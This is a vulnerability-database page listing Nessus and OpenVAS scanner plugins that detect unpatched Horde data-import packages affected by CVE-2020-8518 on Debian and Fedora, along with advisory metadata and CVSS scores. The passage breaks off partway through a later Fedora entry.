Search...

Debian DLA-2174-1 : php-horde-data security update

2020-04-15T00:00:00

ID DEBIAN_DLA-2174.NASL
Type nessus
Reporter This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-01-11T00:00:00

Description

A remote code execution vulnerability was discovered in the Horde Application Framework. An authenticated remote attacker could use this flaw to cause execution of uploaded CSV data.

For Debian 8 'Jessie', this problem has been fixed in version 2.1.0-5+deb8u1.

We recommend that you upgrade your php-horde-data packages.

NOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DLA-2174-1. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(135497);
  script_version("1.4");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");

  script_cve_id("CVE-2020-8518");

  script_name(english:"Debian DLA-2174-1 : php-horde-data security update");
  script_summary(english:"Checks dpkg output for the updated package.");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote Debian host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"A remote code execution vulnerability was discovered in the Horde
Application Framework. An authenticated remote attacker could use this
flaw to cause execution of uploaded CSV data.

For Debian 8 'Jessie', this problem has been fixed in version
2.1.0-5+deb8u1.

We recommend that you upgrade your php-horde-data packages.

NOTE: Tenable Network Security has extracted the preceding description
block directly from the DLA security advisory. Tenable has attempted
to automatically clean and format it as much as possible without
introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://lists.debian.org/debian-lts-announce/2020/04/msg00008.html"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://packages.debian.org/source/jessie/php-horde-data"
  );
  script_set_attribute(
    attribute:"solution", 
    value:"Upgrade the affected php-horde-data package."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Horde CSV import arbitrary PHP code execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:php-horde-data");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:8.0");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/02/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/04/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/04/15");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}


include("audit.inc");
include("debian_package.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;
if (deb_check(release:"8.0", prefix:"php-horde-data", reference:"2.1.0-5+deb8u1")) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:deb_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");

JSON Vulners Source

Initial Source

{"id": "DEBIAN_DLA-2174.NASL", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DLA-2174-1 : php-horde-data security update", "description": "A remote code execution vulnerability was discovered in the Horde Application Framework. An authenticated remote attacker could use this flaw to cause execution of uploaded CSV data.\n\nFor Debian 8 'Jessie', this problem has been fixed in version 2.1.0-5+deb8u1.\n\nWe recommend that you upgrade your php-horde-data packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2020-04-15T00:00:00", "modified": "2021-01-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/135497", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://packages.debian.org/source/jessie/php-horde-data", "https://lists.debian.org/debian-lts-announce/2020/04/msg00008.html", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8518"], "cvelist": ["CVE-2020-8518"], "immutableFields": [], "lastseen": "2021-08-19T12:15:31", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0423"]}, {"type": "cve", "idList": ["CVE-2020-8518"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2174-1:6CB8F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-8518"]}, {"type": "fedora", "idList": ["FEDORA:7958E601EA83", "FEDORA:BB0F060F105F"]}, {"type": "nessus", "idList": ["FEDORA_2020-0248AD925E.NASL", "FEDORA_2020-1E7CC91D55.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877464", "OPENVAS:1361412562310877466", "OPENVAS:1361412562310892174"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156872"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-8518"]}, {"type": "zdt", "idList": ["1337DAY-ID-34096", "1337DAY-ID-34133"]}], "rev": 4}, "score": {"value": 6.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2020-0423"]}, {"type": "cve", "idList": ["CVE-2020-8518"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2174-1:6CB8F"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-8518"]}, {"type": "fedora", "idList": ["FEDORA:7958E601EA83", "FEDORA:BB0F060F105F"]}, {"type": "nessus", "idList": ["FEDORA_2020-0248AD925E.NASL", "FEDORA_2020-1E7CC91D55.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813197", "OPENVAS:1361412562310877464", "OPENVAS:1361412562310877466", "OPENVAS:1361412562310892174"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156872"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-8518"]}, {"type": "zdt", "idList": ["1337DAY-ID-34096", "1337DAY-ID-34133"]}]}, "exploitation": null, "vulnersScore": 6.7}, "pluginID": "135497", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2174-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135497);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2020-8518\");\n\n script_name(english:\"Debian DLA-2174-1 : php-horde-data security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A remote code execution vulnerability was discovered in the Horde\nApplication Framework. An authenticated remote attacker could use this\nflaw to cause execution of uploaded CSV data.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.1.0-5+deb8u1.\n\nWe recommend that you upgrade your php-horde-data packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/04/msg00008.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/php-horde-data\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected php-horde-data package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Horde CSV import arbitrary PHP code execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php-horde-data\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"php-horde-data\", reference:\"2.1.0-5+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["p-cpe:/a:debian:debian_linux:php-horde-data", "cpe:/o:debian:debian_linux:8.0"], "solution": "Upgrade the affected php-horde-data package.", "nessusSeverity": "High", "cvssScoreSource": "", "vpr": {"risk factor": "High", "score": "7.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-04-14T00:00:00", "vulnerabilityPublicationDate": "2020-02-17T00:00:00", "exploitableWith": ["Metasploit(Horde CSV import arbitrary PHP code execution)"], "_state": {"dependencies": 1647589307, "score": 0}}

{"openvas": [{"lastseen": "2020-04-17T17:06:49", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-04-16T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for php-horde-data (DLA-2174-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8518"], "modified": "2020-04-16T00:00:00", "id": "OPENVAS:1361412562310892174", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892174", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from the referenced\n# advisories, and are Copyright (C) by the respective right holder(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892174\");\n script_version(\"2020-04-16T03:00:06+0000\");\n script_cve_id(\"CVE-2020-8518\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-16 03:00:06 +0000 (Thu, 16 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-04-16 03:00:06 +0000 (Thu, 16 Apr 2020)\");\n script_name(\"Debian LTS: Security Advisory for php-horde-data (DLA-2174-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2020/04/msg00008.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2174-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/951537\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-horde-data'\n package(s) announced via the DLA-2174-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability was discovered in the Horde\nApplication Framework. An authenticated remote attacker could use this\nflaw to cause execution of uploaded CSV data.\");\n\n script_tag(name:\"affected\", value:\"'php-horde-data' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n2.1.0-5+deb8u1.\n\nWe recommend that you upgrade your php-horde-data packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"php-horde-data\", ver:\"2.1.0-5+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-26T16:41:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-02-14T00:00:00", "type": "openvas", "title": "Fedora: Security Advisory for php-horde-Horde-Data (FEDORA-2020-0248ad925e)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8518"], "modified": "2020-02-25T00:00:00", "id": "OPENVAS:1361412562310877464", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877464", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877464\");\n script_version(\"2020-02-25T10:11:08+0000\");\n script_cve_id(\"CVE-2020-8518\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-25 10:11:08 +0000 (Tue, 25 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-14 04:12:14 +0000 (Fri, 14 Feb 2020)\");\n script_name(\"Fedora: Security Advisory for php-horde-Horde-Data (FEDORA-2020-0248ad925e)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2020-0248ad925e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2PRPIFQDGYPQ3F2TF2ETPIL7IYNSVVZQ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-horde-Horde-Data'\n package(s) announced via the FEDORA-2020-0248ad925e advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A data import and export API, with backends for:\n\n * CSV\n\n * TSV\n\n * iCalendar\n\n * vCard\n\n * vNote\n\n * vTodo\");\n\n script_tag(name:\"affected\", value:\"'php-horde-Horde-Data' package(s) on Fedora 30.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC30\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php-horde-Horde-Data\", rpm:\"php-horde-Horde-Data~2.1.5~1.fc30\", rls:\"FC30\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-26T16:40:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-02-14T00:00:00", "type": "openvas", "title": "Fedora: Security Advisory for php-horde-Horde-Data (FEDORA-2020-1e7cc91d55)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-8518"], "modified": "2020-02-25T00:00:00", "id": "OPENVAS:1361412562310877466", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310877466", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.877466\");\n script_version(\"2020-02-25T10:11:08+0000\");\n script_cve_id(\"CVE-2020-8518\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-25 10:11:08 +0000 (Tue, 25 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-14 04:12:17 +0000 (Fri, 14 Feb 2020)\");\n script_name(\"Fedora: Security Advisory for php-horde-Horde-Data (FEDORA-2020-1e7cc91d55)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC31\");\n\n script_xref(name:\"FEDORA\", value:\"2020-1e7cc91d55\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DKTNYDBDVJNMVC7QPXQI7CMPLX3USZ2T\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php-horde-Horde-Data'\n package(s) announced via the FEDORA-2020-1e7cc91d55 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A data import and export API, with backends for:\n\n * CSV\n\n * TSV\n\n * iCalendar\n\n * vCard\n\n * vNote\n\n * vTodo\");\n\n script_tag(name:\"affected\", value:\"'php-horde-Horde-Data' package(s) on Fedora 31.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC31\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"php-horde-Horde-Data\", rpm:\"php-horde-Horde-Data~2.1.5~1.fc31\", rls:\"FC31\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-02-27T19:36:46", "description": "Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP code via CSV data, leading to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-17T15:15:00", "type": "debiancve", "title": "CVE-2020-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2020-02-17T15:15:00", "id": "DEBIANCVE:CVE-2020-8518", "href": "https://security-tracker.debian.org/tracker/CVE-2020-8518", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-07-28T14:46:51", "description": "A data import and export API, with backends for: * CSV * TSV * iCalendar * vCard * vNote * vTodo ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-14T01:12:25", "type": "fedora", "title": "[SECURITY] Fedora 30 Update: php-horde-Horde-Data-2.1.5-1.fc30", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2020-02-14T01:12:25", "id": "FEDORA:7958E601EA83", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:51", "description": "A data import and export API, with backends for: * CSV * TSV * iCalendar * vCard * vNote * vTodo ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-14T01:43:11", "type": "fedora", "title": "[SECURITY] Fedora 31 Update: php-horde-Horde-Data-2.1.5-1.fc31", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2020-02-14T01:43:11", "id": "FEDORA:BB0F060F105F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:27:19", "description": "Horde Groupware Webmail Edition 5.2.22 allows injection of arbitrary PHP\ncode via CSV data, leading to remote code execution.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=951537>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-17T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8518", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8518"], "modified": "2020-02-17T00:00:00", "id": "UB:CVE-2020-8518", "href": "https://ubuntu.com/security/CVE-2020-8518", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-10-16T12:32:40", "description": "**Horde_Data 2.1.5**\n\n - [jan] Fix Remote Code Execution vulnerability (CVE-2020-8518, Reported by: Andrea Cardaci/SSD).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-02-14T00:00:00", "type": "nessus", "title": "Fedora 31 : 